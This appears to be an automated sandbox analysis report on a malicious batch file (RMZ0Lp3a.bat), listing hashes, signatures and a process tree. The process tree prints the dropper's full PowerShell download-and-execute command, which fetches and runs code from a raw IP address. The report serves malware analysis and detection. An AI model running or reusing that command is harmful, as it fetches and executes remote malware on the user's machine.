Analysis
- max time kernel: 105s
- max time network: 110s
- platform: windows10_x64
- resource: win10v200217
- submitted: 01-04-2020 22:10
Static task: static1

Behavioral task: behavioral1
- Sample: RMZ0Lp3a.bat
- Resource: win7v200217 (windows7_x64)
- 0 signatures, 0 seconds

Behavioral task: behavioral2
- Sample: RMZ0Lp3a.bat
- Resource: win10v200217 (windows10_x64)
- 0 signatures, 0 seconds
General
- Target: RMZ0Lp3a.bat
- Size: 189B
- MD5: 90218b146362ab63d589252e71438a02
- SHA1: dc39398af964a74d66f9c56b7fca4e744aa358e5
- SHA256: c143487b82fdc527a3a7f896b0afc37ee38a0f571f200f7d09fc1c01f39acaf6
- SHA512: 67f13a2db6187c3a7b9647006fd3dd3730b38b09afd47f534905d0ece9aef341f0c1d9374e6a6ef435eac21450c0837dc24fd8a30b68a3b90018ad30e060c4bc
- Score: 10/10
Malware Config
Extracted
- Language: ps1
- Source: ps1.dropper
- URLs: http://185.103.242.78/pastes/RMZ0Lp3a
Signatures
- Program crash (1 IoC)
  Processes:
  pid   pid_target  process       target process
  3904  3516        WerFault.exe  powershell.exe
- Suspicious use of AdjustPrivilegeToken (3 IoCs)
  Processes:
  description                pid   process
  Token: SeRestorePrivilege  3904  WerFault.exe
  Token: SeBackupPrivilege   3904  WerFault.exe
  Token: SeDebugPrivilege    3904  WerFault.exe
- Suspicious behavior: EnumeratesProcesses (14 IoCs)
  Processes:
  pid   process
  3904  WerFault.exe  (14 identical entries)
Processes
- C:\Windows\system32\cmd.exe (depth 1, PID 4016)
  Command line: C:\Windows\system32\cmd.exe /c "C:\Users\Admin\AppData\Local\Temp\RMZ0Lp3a.bat"
  - C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe (depth 2, PID 3516)
    Command line: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "IEX (New-Object System.Net.WebClient).DownloadString('http://185.103.242.78/pastes/RMZ0Lp3a');Invoke-CDLIHL;Start-Sleep -s 10000"
    - C:\Windows\SysWOW64\WerFault.exe (depth 3, PID 3904)
      Command line: C:\Windows\SysWOW64\WerFault.exe -u -p 3516 -s 704
      Signatures:
      - Program crash
      - Suspicious use of AdjustPrivilegeToken
      - Suspicious behavior: EnumeratesProcesses